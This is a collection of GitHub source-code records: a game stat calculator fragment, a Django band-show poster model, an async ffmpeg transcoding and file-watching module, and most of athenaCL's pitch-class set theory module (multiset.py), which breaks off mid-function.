増加があり(1)なし(0)、減少は(-1)\n bonds : 溜めているゲージの数、繰り上げ(0 > 1, 1 > 2, 2 > 3, 3 > 4、4超過は入力なし(0))\n 他は数値\n '''\n b = self.bonds*bonds1 + self.bonds*bonds2 + self.bonds*bonds3\n\n self.result = status_up + physical*self.physical_per + skill_up*self.skill_per + self.tips[tips] \\\n + self.condition_v*condition + self.op[op] + b\n\n return self.result\n# %%\n","repo_name":"sugimochi97/uma_musume","sub_path":"p_calc/p.py","file_name":"p.py","file_ext":"py","file_size_in_byte":4042,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"4711580410","text":"from django.db import models\nfrom django.utils import timezone\nfrom django.utils.translation import ugettext_lazy as _\n\nclass Poster(models.Model):\n\n class Meta(object):\n verbose_name=_(\"Band shows\")\n verbose_name_plural=_(\"Band shows\")\n\n venue = models.CharField(\n max_length=200,\n blank=False,\n null=False,\n verbose_name=_(\"City, Venue\")\n )\n\n show_date = models.DateField(\n blank=False,\n null=False,\n verbose_name=_(\"Date of Show\")\n )\n\n show_info = models.TextField(\n blank=False,\n null=False,\n verbose_name=_(\"Show Info\")\n )\n\n affiche = models.ImageField(\n blank=True,\n verbose_name=_(\"Affiche\"),\n null=True\n )\n\n tickets_link = models.URLField(\n max_length = 400,\n blank=True,\n verbose_name=_(\"Link to buy tickets\")\n )\n\n published_date = models.DateTimeField(\n blank=True,\n null=True,\n verbose_name=_(\"Published, date\")\n )\n\n def publish(self):\n self.save()\n\n def __str__(self):\n return \"%s %s\" %(self.venue, self.show_date)\n","repo_name":"imhub/prklb","sub_path":"shows/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"2461909290","text":"import asyncio\nfrom functools import partial\nimport os\nimport shutil\nfrom fastapi import BackgroundTasks \nimport ffmpeg\nfrom src.api.controllers.codec_controller import get_all_codecs\nfrom src.api.controllers.episode_controller import get_episode\nfrom src.api.controllers.series_controller import get_series\nfrom src.api.routes.codec_routes import get_all_containers_route\nfrom src.api.routes.profile_routes import get_all_profiles\nfrom src.api.routes.scan_routes import scan_all_series, scan_queue, scan_series, validate_database\nfrom src.api.utils import get_root_folder, get_series_folder, get_transcode_folder\n\nfrom src.models.queue import queue_instance\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\n\nasync def scan_queue_periodic():\n while True:\n await asyncio.sleep(20)\n await scan_queue()\n\nasync def process_episodes_in_queue_periodic():\n while True:\n q = queue_instance.queue\n w = True\n while q and w:\n await asyncio.sleep(5)\n await process_episode(queue_instance.peek())\n await queue_instance.dequeue()\n\n\nasync def process_episode(e):\n if not e:\n return\n episode = await get_episode(e['id'])\n series = await get_series(episode['series_id'])\n profiles = await get_all_profiles()\n profile = profiles[series['profile_id']]\n file_name = os.path.splitext(episode['filename'])[0] # Remove existing extension\n\n preset = profile['speed']\n encoder = profile['encoder']\n output_container = profile['container']\n output_extension = profile['extension']\n\n input_file = os.path.join(await get_series_folder(), series['id'], episode['season_name'], episode['filename'])\n output_file = os.path.join(await get_transcode_folder(), f\"{file_name}.{output_extension}\")\n\n\n probe = ffmpeg.probe(input_file)\n video_stream = next((stream for stream in probe['streams'] if stream['codec_type'] == 'video'), None)\n\n check = video_stream['codec_name']\n if check == profile['codec']:\n return\n loop = asyncio.get_event_loop()\n if encoder == 'mpeg4' or encoder == 'h264': \n await loop.run_in_executor(None, lambda: ffmpeg.input(input_file).output(output_file, vcodec=encoder, f=output_container).run())\n await loop.run_in_executor(None, partial(shutil.move, output_file, input_file))\n else:\n await loop.run_in_executor(None, lambda: ffmpeg.input(input_file).output(output_file, vcodec=encoder, preset=preset, f=output_container).run())\n await loop.run_in_executor(None, partial(shutil.move, output_file, input_file)) \n await asyncio.sleep(20)\n return\n\n\n\n\nclass FileChangeHandler(FileSystemEventHandler):\n def on_modified(self, event):\n print(f'File {event.src_path} has been modified')\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n loop.run_until_complete(asyncio.gather(scan_all_series(), validate_database()))\n\n def on_created(self, event):\n print(f'File {event.src_path} has been created')\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n loop.run_until_complete(asyncio.gather(scan_all_series(), validate_database()))\n\n def on_deleted(self, event):\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n loop.run_until_complete(validate_database())\n loop.run_until_complete(asyncio.gather(scan_all_series(), validate_database()))\n\ndef start_watchdog(directory):\n observer = Observer()\n handler = FileChangeHandler()\n observer.schedule(handler, directory, recursive=True)\n 
observer.start()","repo_name":"alexmichaelkeith/encoderr","sub_path":"src/tasks/periodic.py","file_name":"periodic.py","file_ext":"py","file_size_in_byte":3651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"32647997063","text":"import copy\nimport unittest, doctest\n\n\n# master data tables used for all set data access\nfrom athenaCL.libATH import setTables\nfrom athenaCL.libATH import dialog\nfrom athenaCL.libATH import drawer\nfrom athenaCL.libATH import pitchTools\nfrom athenaCL.libATH import language\nfrom athenaCL.libATH import spectral\nfrom athenaCL.libATH import sieve\nfrom athenaCL.libATH import error\nlang = language.LangObj()\n\nSCDICT = setTables.SCDICT # data for all sets, vectors and docs\nTNMAX = setTables.TNMAX # dictionary\nTNIMAX = setTables.TNIMAX # ref dictionary\nTNREF = setTables.TNREF # ref dcitionary\nSCREF = setTables.SCREF # ref dcitionary\nFORTE = setTables.FORTE # classic forte table\n\n\n_MOD = 'multiset.py'\nfrom athenaCL.libATH import prefTools\nenvironment = prefTools.Environment(_MOD)\n\n\n\n#-----------------------------------------------------------------||||||||||||--\n\n# these function are depreciated here\n# moved to pitchTools.py\n# thes are provided for bkward compat\ntransposer = pitchTools.pcTransposer\npitchSpaceTransposer = pitchTools.psTransposer\n\n#-----------------------------------------------------------------||||||||||||--\n# tools for processing sets\n# these methods are out of date (post 1.2) and should be phased out of usage\n\ndef pcSetTransposer(chord, trans):\n \"\"\"transposes an entire set by trans. w/ mod12\n will strip oct info, retain micro info\n\n >>> pcSetTransposer([3,4,5], 3)\n (6, 7, 8)\n \"\"\"\n newSet = []\n for pc in chord:\n newSet.append(pitchTools.pcTransposer(pc, trans))\n return tuple(newSet)\n \ndef psSetTransposer(chord, trans):\n \"\"\"transposes an entire set by trans, no mod12\n retains oct info, micro info \n\n >>> pcSetTransposer([3,4,5], 14)\n (5, 6, 7)\n \"\"\"\n newSet = []\n for pc in chord: ## works for negative or positive numbers\n newSet.append(pitchTools.psTransposer(pc, trans))\n return tuple(newSet)\n \ndef pcInverter(nrmlSet):\n \"\"\"returns the inversion of a chord (list of pitches in normal form)\n\n >>> pcInverter((0,4,7))\n (0, 3, 7)\n >>> pcInverter((5,6,8))\n (0, 2, 3)\n \"\"\"\n tempSet = []\n invertSet = []\n for pitch in nrmlSet:\n tempSet.append((12 - pitch) % 12)\n tempSet.reverse()\n for pitch in tempSet:\n invertSet.append(transposer(pitch, (12 - tempSet[0])))\n return tuple(invertSet)\n\ndef psInverter(normalChord): \n \"\"\"returns the inversion of a chord (list of pitches in normal form)\n returns inversion with same starting value in pitch space\n must be entered as normal form\n \"\"\" \n modInversiontSet = pcInverter(normalChord)\n \n sourceSetAsOctMultipliers = []\n for entry in normalChord:\n octMultiplier, modPC = pitchTools.splitOctPs(entry)\n # gives original order of oct multipliers fo each member of set\n sourceSetAsOctMultipliers.append(octMultiplier)\n \n modInversiontSet = list(modInversiontSet)\n # do mod 12 transposition\n invertedChord = pcSetTransposer(modInversiontSet, normalChord[0])\n \n invertedChord = list(invertedChord)\n #check octaves\n for i in range(0,len(normalChord)) :\n sourceOct = sourceSetAsOctMultipliers[i]\n currentOct, modPC = pitchTools.splitOctPs(invertedChord[i]) \n if sourceOct == currentOct:\n pass\n else: # find difference and make up\n if sourceOct > currentOct:\n direction = 'up'\n else:\n direction = 'down'\n distance = abs(currentOct - sourceOct)\n if direction == 'up':\n invertedChord[i] = invertedChord[i] + (12 * distance)\n else:\n invertedChord[i] = invertedChord[i] - (12 * distance) \n return tuple(invertedChord)\n\n 
\n#-----------------------------------------------------------------||||||||||||--\ndef psSetToMason(chord):\n \"\"\"named after a music educator named Mason by Michael Gogins\n convert any pitch space / class set to a 'mason' value\n OR-ing, to be precise, mod 4095 (the total number of unordered\n pitch-class sets in 12TET), not adding. In other words, a bit-field of 12\n bits, one bit per pitch-class.\n \"\"\"\n newSet = []\n for pc in chord:\n pc = pitchTools.pcTransposer(pc, 0) # make mod 12\n if pc not in newSet: # remove redundancies\n newSet.append(pc)\n mason = 0\n for i in newSet:\n mason = mason + pow(2, i)\n return mason % 4095\n\n#-----------------------------------------------------------------||||||||||||--\n# utility to calculate normal form\ndef findNormalT(pcSet, setMatrix=None):\n \"\"\"finds normal form of any pc set and returns forte number\n as a scTriple data structure, and transposition from normal form\n pcSet may contain psReals, and as such, need to be converted to ints\n\n >>> findNormalT([3,4,5])\n ((3, 1, 0), 3)\n\n \"\"\"\n if setMatrix == None: # use forte as default\n setMatrix = FORTE\n MONADscTuple = (1,1,0)\n\n # check for bad data\n if drawer.isStr(pcSet):\n return None # error, no strings supported here\n if drawer.isList(pcSet):\n for psReal in pcSet:# make sure all values are numbers; no strings allowed\n if drawer.isStr(psReal):\n return None # break, return None as error\n # check for unusual data\n if drawer.isNum(pcSet): # its a single number\n pcVal = pitchTools.roundMicro(pcSet)\n # second number is transposition from 0\n return MONADscTuple, (pcVal % 12)\n if len(pcSet) == 1: #filter out monad!\n pcVal = pitchTools.roundMicro(pcSet[0])\n return MONADscTuple, (pcVal % 12)\n\n # scrub and go\n pcSetClone = []\n for psReal in pcSet: # pcSet may contian psReal, w/ floating values\n pcSetClone.append(pitchTools.roundMicro(psReal))\n #check fr non base 12 numbers, negative numbers, redundancies\n pcSetClone = list(pcSetTransposer(pcSetClone, 0))\n pcSetClone.sort()\n\n i = 0\n chord = []\n for i in range(0,12): # remove redundancies\n if i in pcSetClone:\n chord.append(i)\n card = len(chord) \n if card < 1: # monad has already been filtered out\n return None # 2nd no is transposition from 0\n if card == 1: # this is a set like (3,3,3,3)\n return MONADscTuple, (pcSet[0] % 12) \n elif card > 12:\n return None # 'irrational cardinality error'\n\n rotIndices = list(range(0, card))\n foundIndex = None #control variable\n for rot in rotIndices:\n r = rot # dont need to add 1? 
+ 1\n rotSet = chord[r:card] + chord[0:r]\n dif = rotSet[0]\n pSet = pcSetTransposer(rotSet, -dif)\n iSet = tuple(pcInverter(pSet))\n maxRange = len(setMatrix[card])\n # check all sets of given card for match\n for index in range(1, maxRange): # start with 1, not zero\n # this is a default; may be a symmetrical set and have no inversion\n foundInv = 'A' \n # test each set in this cardinality; \"0\" gets pitches\n testSet = tuple(setMatrix[card][index][0]) \n if iSet == testSet:\n foundIndex = index\n foundInv = 'B' #nt sure yet if 1 or 0\n break \n elif pSet == testSet:\n foundIndex = index\n foundInv = 'A' #nt sure yet if 1 or 0 \n break\n if foundIndex != None:\n break\n if foundIndex == None: ## no set found\n return None #'failed!!!'\n \n if foundInv == 'B':\n # has inversion that is non-redundant (variant)\n if setMatrix[card][foundIndex][2][1] == 0 : \n scInv = -1\n else: scInv = 0\n elif foundInv == 'A':\n # has inversion that is non-redundant (variant)\n if setMatrix[card][foundIndex][2][1] == 0 :\n scInv = 1\n else: scInv = 0\n return (card, foundIndex, scInv), dif\n\n\ndef findNormal(pcSet, setMatrix=None):\n \"\"\"same as above but w/o returning transposition\"\"\"\n scTuple, dif = findNormalT(pcSet, setMatrix)\n return scTuple\n\n\n#-----------------------------------------------------------------||||||||||||--\n# conversion utilities\n\ndef forteToSc(card, index, inversion=-2):\n \"\"\"checks for proper inversion and supplies one (A) if not given\n acts as a general filter for all functions calling old forte numbers or\n possible errors: this function will check and suply an alternitive if \n there is an error rather than raising an exception. its used heavily \n and is a source of possible errors\n\n >>> forteToSc(4,3)\n (4, 3, 0)\n \"\"\"\n boundError = 0\n if card > 12 or card < 1:\n boundError = 1\n else: scCard = card #all other cards are good + used\n\n # checks cardinality fr a valid index number\n # supplies index 1 fr a valid card that does nt have\n # a valid index. !!!!!!!!!! 
should return an error!\n \n if card == 1 or card == 11:\n if index <= 0 or index >2:\n boundError = 1\n else: scIndex = index\n if card == 2 or card == 10:\n if index <= 0 or index >6:\n boundError = 1\n else: scIndex = index\n elif card == 3 or card == 9:\n if index <= 0 or index > 12:\n boundError = 1\n else: scIndex = index\n elif card == 4 or card == 8:\n if index <= 0 or index > 29:\n boundError = 1\n else: scIndex = index\n elif card == 5 or card == 7:\n if index <= 0 or index > 38:\n boundError = 1\n else: scIndex = index\n elif card == 6:\n if index <= 0 or index > 50:\n boundError = 1\n else: scIndex = index\n elif card == 12: ## aggregate!\n if index <= 0 or index > 2:\n boundError = 1\n else: scIndex = index\n\n if boundError:\n environment.printWarn(['boundary error', card, index, inversion])\n return None\n # check fr proper inversion status useing variance vector\n # if_no inv give fr a set, 0 or 1 is suplied, never -1\n # if_no inversion is supplied, acts as if_in Tn/i classification\n \n if inversion <= -2 or inversion >= 2 or inversion == 0:\n if FORTE[scCard][scIndex][2][1] == 0 : \n # has inversion that is non-redundant (variant)\n scInv = 1\n else: scInv = 0\n if inversion == -1:\n if FORTE[scCard][scIndex][2][1] == 0 :\n scInv = -1\n else: scInv = 0\n if inversion == 1:\n if FORTE[scCard][scIndex][2][1] == 0 :\n scInv = 1 \n else: scInv = 0\n\n return scCard, scIndex, scInv\n\ndef tupleToSc(rawForte):\n \"\"\"accepts single tuple as input, then uses forte to sc to \n to supply necessary inversion, if needed.\n \"\"\"\n if rawForte[0] == 1:\n return (1,1,0) \n try:\n inv = rawForte[2]\n except:\n inv = -2 #unknown inversion value: forte to sc will suply\n scTuple = forteToSc(rawForte[0], rawForte[1], inv)\n if scTuple == None:\n raise ValueError\n return scTuple\n\n\ndef scToStr(rawForte):\n \"\"\"raw fortte is a tuple with either 2 or 3 elements, needing to be \n checked\n\n >>> scToStr([4,3])\n '4-3'\n \"\"\"\n if drawer.isInt(rawForte):\n return '1-1' \n elif rawForte[0] == 1:\n return '1-1' \n \n scTuple = tupleToSc(rawForte) \n if len(scTuple) != 3: raise ValueError # should never happen\n \n card = str(scTuple[0])\n indx = str(scTuple[1])\n if scTuple[2] == 0:\n inv = ''\n elif scTuple[2] == 1:\n inv = 'A'\n elif scTuple[2] == -1:\n inv = 'B'\n else: inv = 'error'\n return card + '-' + indx + inv\n \n\n\n# will be depreciated, as now in pitch tools\ndef anySetToPcs(set):\n # set can contain any int, positive or neg\n # input must be a list\n pcsSet = []\n for entry in set:\n modulatedEntry = transposer(entry, 0)\n pcsSet.append(modulatedEntry)\n pcsSet = tuple(pcsSet)\n return pcsSet\n\n\ndef forteToPcs(rawForte): \n \"\"\"\n >>> forteToPcs([6,45])\n (0, 2, 3, 4, 6, 9)\n \"\"\"\n scTuple = tupleToSc(rawForte)\n return SCDICT[scTuple[0]][scTuple[1], scTuple[2]][0]\n\ndef forteToVar(rawForte):\n \"\"\"\n >>> forteToVar([5,3])\n (1, 0, 0, 0, 1, 1, 1, 0)\n \"\"\"\n scTuple = tupleToSc(rawForte)\n return SCDICT[scTuple[0]][scTuple[1], scTuple[2]][1]\n\ndef forteToIcv(rawForte):\n \"\"\"\n >>> forteToIcv([8,3])\n (6, 5, 6, 5, 4, 2)\n \"\"\"\n scTuple = tupleToSc(rawForte)\n return SCDICT[scTuple[0]][scTuple[1], scTuple[2]][2]\n\n\ndef forteToZData(rawForte): \n \"\"\"returns sc tuple of z relation, if it exists\n otherwise, returns none\n >>> forteToZData([6,43])\n (6, 17, 1)\n \"\"\" \n scTuple = tupleToSc(rawForte)\n zVal = FORTE[scTuple[0]][scTuple[1]][3] # gets z relation val\n # z val is index of relative z relation\n if zVal == 0:\n return None\n else:\n # find 
card complement\n card = scTuple[0]\n return tupleToSc((card, zVal))\n\ndef forteToRefData(rawForte):\n \"\"\"returns dictionary of references from SCdata\"\"\"\n scTuple = tupleToSc(rawForte)\n setRef = SCREF[scTuple]\n if setRef == {} or setRef == None:\n return None\n else:\n return setRef\n\n\ndef getAllScTriples(cardRange='all', tniTog=0):\n \"\"\"gets all scTriples within a variety of ranges\n card range can be specified as string 'all', \n as an int (getting just the values of that int\n or as a range from 1 to 12; if range, last values is inclusif\"\"\"\n if cardRange == 'all':\n gatherCards = list(range(1,13))\n elif drawer.isInt(cardRange):\n gatherCards = [cardRange,] # only get one card\n elif drawer.isList(cardRange):\n if cardRange[1] < cardRange[0]:\n raise ValueError('bad cardinality range given')\n elif cardRange[0] == cardRange[1]:\n gatherCards = [cardRange[0],] # only get one card\n else:\n gatherCards = list(range(cardRange[0], cardRange[1]+1))\n found = []\n for scTriple in list(TNREF.keys()):\n card = scTriple[0]\n inv = scTriple[2]\n if card in gatherCards:\n if tniTog and inv == -1: pass # leave out inversions\n else:\n found.append(scTriple)\n found.sort()\n return found\n\n\ndef _strToSearchList(str):\n \"\"\"removes bad characters, returns a list of words\"\"\"\n str = str.replace('-',' ')\n str = str.replace(',',' ')\n str = str.replace('/',' ')\n str = str.replace('\\ ', ' ')\n strList = str.split() # returns a list\n return strList \n\ndef refData(rawForte):\n \"\"\"returns dictionary of references from SCdata\n\n >>> refData([4,3])\n {'name': ('alternating tetramirror',)}\n \"\"\"\n scTuple = tupleToSc(rawForte)\n setRef = SCREF[scTuple]\n if setRef == {} or setRef == None:\n return None\n else:\n return setRef\n\n\ndef findRef(searchStr, refType='name', setRange='all', tniMode=0):\n \"\"\"\n >>> findRef('Neapolitan pentachord')[0]\n (5, 32, 1)\n >>> findRef('minor-second diminished tetrachord')[0]\n (4, 13, 1)\n \"\"\"\n searchWords = _strToSearchList(searchStr) # returns a list\n scoreDict = {}\n for setTuple in getAllScTriples('all', tniMode):\n refDict = refData(setTuple)\n scoreDict[setTuple] = 0\n if refDict == None:\n continue\n if refType in list(refDict.keys()): # name groups\n nameList = refDict[refType]\n nameWords = []\n for nameStrings in nameList: # list of strings\n nameWords = nameWords + _strToSearchList(nameStrings) \n for sw in searchWords:\n swTemp = sw.lower() # keep case\n for nw in nameWords:\n nwTemp = nw.lower() # keep case\n if nwTemp.find(swTemp) >= 0:\n scoreDict[setTuple] = scoreDict[setTuple] + 1 # add\n rankList = []\n for setTuple in list(scoreDict.keys()):\n if scoreDict[setTuple] == 0:\n del scoreDict[setTuple] # remove if 0 score\n else: # add ranks to a list\n rankList.append((scoreDict[setTuple], setTuple))\n\n rankList.sort()\n rankList.reverse() \n searchResults = []\n for rank, setTuple in rankList: # ordered\n searchResults.append(setTuple)\n if searchResults == []:\n return None\n else:\n return searchResults # list of triples\n\n\n\n#-----------------------------------------------------------------||||||||||||--\nclass Multiset:\n \"\"\"object of a set which may be interpreted as a set\n pcs, ps, or setclass. 
order and multiplcity may or may not matter\n thus it is called a multiset\n object orientated structure\n \"\"\"\n \n def __init__(self, psRealSrc=None, scTriple=None):\n \"\"\" \n _psRealSrc is stored as original data entered; not transposed or changed\n and should not be read as data\n scTriple stores forte name as data strcuture\n must be update for all changes\n psList is the internal data representation\n\n >>> a = Multiset([5,3,15])\n \"\"\"\n self.forms = ('midi', 'psReal', 'psName', 'pch', 'fq', 'pc', # pitch obj\n 'sc', 'dur', 'normal', 'mason', 'card') \n # sone only found in Multiset\n # it is questionable if the t is still required\n # stores transposition away from normal form, and accumulates other\n # transpositions\n self.tRef = 0\n self.dur = 1 # a value for durational weighting, default\n\n if psRealSrc != None and scTriple != None: # both given\n self._psRealSrc = psRealSrc\n self._scTriple = scTriple\n\n elif psRealSrc != None and scTriple == None: # only ps given\n self._psRealSrc = psRealSrc\n normData = findNormalT(self._psRealSrc)\n if normData == None: # an erro has happend\n #print 'problem w/', _psRealSrc\n raise error.MultisetError # cancel set\n self._scTriple, self.tRef = normData\n\n elif psRealSrc == None and scTriple != None: # only sc given\n self._scTriple = scTriple\n self._psRealSrc = forteToPcs(self._scTriple)\n else: # if both None\n raise error.MultisetError\n \n self._psList = [] # a list of pitch objects\n for value in self._psRealSrc: # must be psReal values\n self._psList.append(pitchTools.Pitch(value, 'psReal'))\n # store cardinality\n # removed as redundant; use get\n # self.card = self._scTriple[0]\n\n #-----------------------------------------------------------------------||--\n # data representation\n def _reprListData(self, listData, outer=1):\n msgList = []\n for data in listData:\n if not drawer.isStr(data):\n msgList.append(str(data))\n else:\n msgList.append(data)\n msg = ','.join(msgList) # should be a list of strings\n if outer:\n return '(%s)' % msg\n else:\n return msg\n\n\n def repr(self, type='psReal', outer=1):\n \"\"\"displays a Multiset; outer determines if paranethesis are incl\n\n >>> a = Multiset([2,7,9])\n >>> a.repr()\n '(2,7,9)'\n >>> a.repr('sc')\n '3-9'\n >>> a.repr('midi')\n '(62,67,69)'\n \"\"\"\n # first look for representations that are lists of other data\n if type in ('psReal', 'psName', 'pc', 'midi', 'pch', 'fq'):\n msgList = []\n for pitch in self._psList:\n str = pitch.repr(type)\n msgList.append(str)\n return self._reprListData(msgList, outer)\n # representations that are single values\n elif type == 'dur': # not really needed\n return '%s' % self.dur\n\n elif type == 'sc':\n # scToStr method should be moved inside this class\n return scToStr(self._scTriple)\n\n elif type == 'normal':\n normalList = forteToPcs(self._scTriple)\n return self._reprListData(normalList, outer)\n\n elif type == 'prime':\n # strip inversion info from scTriple, default gets prime\n normalList = forteToPcs(self._scTriple[0:2])\n return self._reprListData(normalList, outer)\n\n elif type == 'icv':\n return self._reprListData(self.icv())\n\n elif type == 'var':\n return self._reprListData(self.var())\n\n elif type == 'ref': # returns a list of strings\n refDict = self.refData()\n msgLines = []\n if refDict == None:\n return None\n else:\n for key in list(refDict.keys()):\n msgLines.append(', '.join(refDict[key]))\n return msgLines\n \n elif type == 'refNames': # return a str of ref names\n refDict = self.refData()\n if refDict == 
None:\n return None\n else:\n refDict = self.refData()\n if 'name' in refDict:\n return ', '.join(refDict['name'])\n else:\n return None\n\n elif type == 'tRef':\n return '%s' % self.tRef\n\n else:\n raise ValueError('bad representation format')\n\n def __str__(self):\n \"\"\"default string representation is as 'psReal'\"\"\"\n return self.repr()\n \n #-----------------------------------------------------------------------||--\n # data entry, updating\n def setDur(self, value):\n self.dur = value\n\n def setT(self, value):\n \"\"\"for setting a tRef on load or otherwise\"\"\"\n self.tRef = value\n\n def __setitem__(self, key, value):\n self._psList[key] = value\n self._update()\n\n def __contains__(self, item):\n \"\"\"item to test is a set obj\"\"\"\n if item in self._psList:\n return 1\n else:\n return 0\n\n def __delitem__(self, key):\n # key is in the order position\n del self._psList[key]\n self._update()\n\n def __getitem__(self, key):\n self._update()\n return self._psList[key]\n\n #-----------------------------------------------------------------------||--\n # data access\n def __len__(self):\n return len(self._psList)\n\n def _access(self, name):\n \"\"\"output data in the appropriate format\n does not change internal data representation\n \"\"\"\n if name == 'sc': # not an attribute of pitch objects\n return self._scTriple\n elif name == 'dur': # not an attribute of pitch objects\n return self.dur\n elif name == 'normal': # not an attribute of pitch objects\n return forteToPcs(self._scTriple)\n elif name == 'mason':\n pcList = []\n for pitch in self._psList:\n pcList.append(pitch.get('pc'))\n return psSetToMason(pcList) # returns an int\n elif name == 'card': # get cardinality\n return self._scTriple[0]\n dataList = []\n for pitch in self._psList:\n dataList.append(pitch.get(name))\n return tuple(dataList)\n\n# def __getattr__(self, name):\n# \"\"\"this method of data access should no longer be used\"\"\"\n# if name not in self.forms:\n# #print 'Multiset: invalid request for', name\n# raise AttributeError\n# return self._access(name) # convert to appropriate data and return\n\n def get(self, name):\n if name not in self.forms:\n raise ValueError('bad format requested')\n return self._access(name) # convert to appropriate data and return\n\n # sc analysis measures\n def var(self):\n return forteToVar(self._scTriple)\n def icv(self):\n\n return forteToIcv(self._scTriple)\n\n# def cv(self, n):\n# return self.scObj.cv(self._scTriple, n)\n# def xv(self, n):\n# return self.scObj.xv(self._scTriple, n)\n\n def z(self): # returns none if no data\n return forteToZData(self._scTriple)\n\n def zObj(self):\n \"\"\"return a new set object for the z related set\"\"\"\n if self.z() != None:\n return Multiset(None, self.z())\n else:\n return None\n\n def refData(self):\n return forteToRefData(self._scTriple)\n\n# def superSet(self, setRange='all', tniMode=0):\n# \"\"\"returns raw triples w/ searchResults, valueDict\n# if match is given, looks for scTriple to match, returns truth\n# else returns list of tuples\"\"\"\n# searchResults, valueDict = self.scObj.findSuperSets(self._scTriple, \n# 'all', tniMode)\n# return searchResults, valueDict\n\n# def rawData(self, key):\n# \"\"\"raw data via key\"\"\"\n# return self.scObj.rawSetData(self._scTriple[0], self._scTriple[1],\n# self._scTriple[2], key)\n\n #-----------------------------------------------------------------------||--\n # data transformations\n\n def _update(self):\n \"\"\"update scTriple in the case that pitches have chaned,\n via inversion 
or replacement\n \"\"\"\n normData = findNormalT(self._access('psReal'))\n if normData == None: # an erro has happend\n environment.printDebug(['_update: problem w/',\n self._access('psReal')])\n raise error.MultisetError\n self._scTriple, self.tRef = normData\n # this was removed as redundant\n #self.card = self._scTriple[0]\n\n def t(self, value):\n \"\"\"transpose each pitch objectin pitch space\n \"\"\"\n for pitch in self._psList:\n pitch.t(value)\n self.tRef = self.tRef + value # update transpositon counter\n\n def tMod(self, value):\n \"\"\"trasnpose w/in modulus, retain octave\"\"\"\n for pitch in self._psList:\n pitch.tMod(value)\n self.tRef = self.tRef + value # update transpositon counter\n\n def i(self, axis=None):\n \"\"\"ps inversions, value is the axis\n value can be used to shift inversion\"\"\"\n if axis == None: # shift around the first note in the series\n axis = self._psList[0].get('psReal')\n for pitch in self._psList:\n pitch.i(axis)\n self._update() # sc may have changed\n\n def iMod(self, axis=0):\n \"\"\"inversions, w/in moduls, retain octave\n axis can be a floating point value like 1.5 for certain inversions\"\"\"\n for pitch in self._psList:\n pitch.iMod(axis)\n self._update() # sc may have changed\n\n def retro(self):\n self._psList.reverse()\n\n def slice(self):\n pass\n \n def rotate(self, newZero):\n \"\"\"rotate multiset\n note: this is a rotation in place; this does not take register\n into account, only pitch order\"\"\"\n if newZero == 0: return \n \n psLen = len(self._psList)\n\n if newZero > 0: # map as positive mod\n newZero = newZero % psLen\n if newZero < 0: # map as negative mod\n newZero = newZero % -psLen\n\n if newZero > 0: # map as positive mod\n self._psList = (self._psList[newZero:psLen] + \n self._psList[0:newZero])\n if newZero < 0: # map as negative mod\n self._psList = (self._psList[psLen+newZero:psLen] + \n self._psList[0:psLen+newZero])\n\n\n def rotateOctave(self, newZero):\n \"\"\"rotate multiset\n assume that new zero is the lowest pitch in the set\n transpose pitches as necessary\n \"\"\"\n if newZero == 0: return \n psLen = len(self._psList)\n if psLen == 0: return\n\n self.rotate(newZero) # do standard rotatioin\n\n # the first pitch should always be the lowest pitch\n if newZero > 0: # map as positive mod\n for i in range(1, psLen): # must be greater than 1\n while self._psList[i].get('psReal') < self._psList[0].get('psReal'):\n self._psList[i].t(12) # transpose up one octave\n # take new first pitch down an octave\n # the first pitch should then always be the lowest pitch\n if newZero < 0: # map as positive mod\n self._psList[0].t(-12)\n for i in range(1, psLen): # must be greater than 1\n # continue to check for pitches below the first pitch\n while self._psList[i].get('psReal') < self._psList[0].get('psReal'):\n self._psList[i].t(12) # transpose up one octave\n\n def spaceOctave(self, shift=1):\n \"\"\"simple method of spacing pitches be increasing or decreasing octaves\n does not take into account existing octave positions\"\"\"\n if shift == 0: return # no change\n for i in range(len(self._psList)):\n # for each pitch in the set, add an additional octave shift\n # for each new pitch, an additional shift unit of octaves is added\n self._psList[i].t(12 * shift * i) # shift may be negatives\n\n\n def copy(self):\n obj = Multiset(self._access('psReal'), self._scTriple)\n obj.dur = copy.deepcopy(self.dur)\n obj.tRef = copy.deepcopy(self.tRef)\n return 
obj\n\n\n\n\n#-----------------------------------------------------------------||||||||||||--\nclass MultisetFactory:\n \"\"\"object to handle getting a set from a user\n sortif a MultiSet factory, for producing objects\n \"\"\"\n def __init__(self):\n pass\n # scObj provided w/ call\n\n def _parseSetInputType(self, usrStr, termObj):\n \"\"\"determine which set input is being provided by user\n termObj may be None; if not interactive, not allow import\n \"\"\"\n usrStr = drawer.strScrub(usrStr, 'L')\n for char in usrStr:\n if char in ['@','&', '|',]: # removed ,'(',')'\n return 'sieve'\n # if a complete user string, get a file dialog\n if usrStr in ['file', 'import', 'spectrum']:\n if not termObj.interact: return None # cant import w/ not interactive\n return 'import'\n if usrStr.find('.txt') >= 0: # assume its a file path\n return 'txt' # import a spectrum\n if usrStr.find('m') >= 0:\n return 'midi'\n if usrStr.find('hz') >= 0 or usrStr.find('fq') >= 0:\n return 'fq'\n # the first character of a set class must always be a number\n # 10, 11, and 12 should be in this list, but requires two characters\n # there must be a dash (not leading), no comas, no periods, \n if (usrStr[0] in ['1','2','3','4','5','6','7','8','9',] and\n usrStr.find('-') != -1 and usrStr.find(',') == -1 and\n usrStr.find('.') == -1 and usrStr[0] != '-'):\n # no other characters should be in this\n return 'forte'\n else:\n for char in usrStr.lower(): # check if it has characters\n if char in list(pitchTools.REFdiaNameToPc.keys()):\n return 'psName'\n return 'psReal' # assume pset numbers\n\n def _parseForte(self, usrStr):\n \"\"\"decifer a user-entered forte value\"\"\"\n #usrStr = self._scrubUsrStr(usrStr)\n #true if string has dash, no commas, no periods: is forte \n scFound = None\n if usrStr.find('b') != -1:\n inv = -1\n usrStr = usrStr.replace('b', ' ')\n else:\n inv = 1 #this value may not be correct, is checked later on\n usrStr = usrStr.replace('a', ' ')\n usrStr = usrStr.replace('-', ' , ') #replace dash with comma\n try:\n rawForte = eval(usrStr)\n except (NameError, SyntaxError):\n raise error.MultisetError\n if rawForte[0] < 1 or rawForte[0] > 12:\n raise 